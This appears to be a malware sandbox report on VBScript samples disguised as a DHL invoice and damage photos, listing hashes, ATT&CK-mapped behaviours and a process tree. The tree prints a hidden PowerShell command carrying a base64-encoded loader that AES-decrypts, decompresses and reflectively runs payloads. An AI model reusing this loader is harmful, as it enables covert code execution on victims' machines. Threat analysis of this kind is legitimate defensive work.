Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1DHL-INVOIC...09.vbs
windows7-x64
8DHL-INVOIC...09.vbs
windows10-2004-x64
10Damage Picture 1.vbs
windows7-x64
8Damage Picture 1.vbs
windows10-2004-x64
10Damage Picture 2.vbs
windows7-x64
8Damage Picture 2.vbs
windows10-2004-x64
10Damage Picture 3.vbs
windows7-x64
8Damage Picture 3.vbs
windows10-2004-x64
10Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 11:49
Static task
static1
Behavioral task
behavioral1
Sample
DHL-INVOICE_10094519030720250009.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DHL-INVOICE_10094519030720250009.vbs
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
Damage Picture 1.vbs
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Damage Picture 1.vbs
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
Damage Picture 2.vbs
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Damage Picture 2.vbs
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
Damage Picture 3.vbs
Resource
win7-20240903-en
General
-
Target
DHL-INVOICE_10094519030720250009.vbs
-
Size
98KB
-
MD5
33e243596a995b134c3862d2746d3a3a
-
SHA1
dc51212190c79cd89cfb6a629e3f7299673fa003
-
SHA256
d28c3371542ec4275020001c02ae26f41d0a11109375cffee6d22f56b9fc5259
-
SHA512
545089424ea61e9c3871a75170d8695331bd991bf7fe8d10a5dd9a136db8b2015f9083faf86023c751550a9faa44ceb6ebfe5b6ae2d593d4261678eaa5a739c5
-
SSDEEP
1536:PxfjFMLSEGgcX4XTA66MrhZLVzsBjuBl6D584BuvQNkHGwhJiz1U8x8x0yCzkIXG:PxGfjjLVzsBKB+uvNHTAaw8CyWVG
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2716 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2716 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2716 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2192 wrote to memory of 2752 2192 WScript.exe 28 PID 2192 wrote to memory of 2752 2192 WScript.exe 28 PID 2192 wrote to memory of 2752 2192 WScript.exe 28 PID 2752 wrote to memory of 2744 2752 cmd.exe 30 PID 2752 wrote to memory of 2744 2752 cmd.exe 30 PID 2752 wrote to memory of 2744 2752 cmd.exe 30 PID 2744 wrote to memory of 2716 2744 cmd.exe 32 PID 2744 wrote to memory of 2716 2744 cmd.exe 32 PID 2744 wrote to memory of 2716 2744 cmd.exe 32 PID 2744 wrote to memory of 2716 2744 cmd.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL-INVOICE_10094519030720250009.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8byJYfE.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\8byJYfE.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskbG95b28gPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGxveW9vKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRsb3lvbyIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRsb3lvbywgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkbG95b28iIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24geXB2anooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0I1OTMwTk16K2RyZWpZMFNUbTcyRWlyazdtWUtyV0EzYkoxRmFyT2FtVmM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2lDeUF0MytKQTFhQnNFeDliOWd6NGc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gdGl3cmkoJHBhcmFtX3Zhcil7CSR0em9oZz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkZGN4YWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkeHZ6ZnE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkdHpvaGcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHh2emZxLkNvcHlUbygkZGN4YWkpOwkkeHZ6ZnEuRGlzcG9zZSgpOwkkdHpvaGcuRGlzcG9zZSgpOwkkZGN4YWkuRGlzcG9zZSgpOwkkZGN4YWkuVG9BcnJheSgpO31mdW5jdGlvbiBucnRnbSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJGtyZWZ3PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGxidG5pPSRrcmVmdy5FbnRyeVBvaW50OwkkbGJ0bmkuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGxveW9vOyR2cmdqej1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGxveW9vKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWlrIGluICR2cmdqeikgewlpZiAoJHVpay5TdGFydHNXaXRoKCc6OiAnKSkJewkJJGl3em14PSR1aWsuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JG9uZW15PVtzdHJpbmdbXV0kaXd6bXguU3BsaXQoJ1wnKTskdndkaXE9dGl3cmkgKHlwdmp6IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJG9uZW15WzBdKSkpOyRqY2ZwYz10aXdyaSAoeXB2anogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkb25lbXlbMV0pKSk7bnJ0Z20gJHZ3ZGlxICRudWxsO25ydGdtICRqY2ZwYyAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
88KB
MD53d0e294629c4b980cd16801696dc84cc
SHA124b01453f405ca41d30c484cc7ef72a2d082d54a
SHA256d4f97ee756677f0c7e58b5528f4b70b58e8fd5c9929af6f9148d9e3c3df5ae2a
SHA512f146cfe93b3bdd562542ef1150f81c0d8c3c852d78b770b77a47815e4b99005aba8e2a55134d6b7ed0be192402ca7b6ceb831e3b2bc66a599a20eb15c6e5ea5f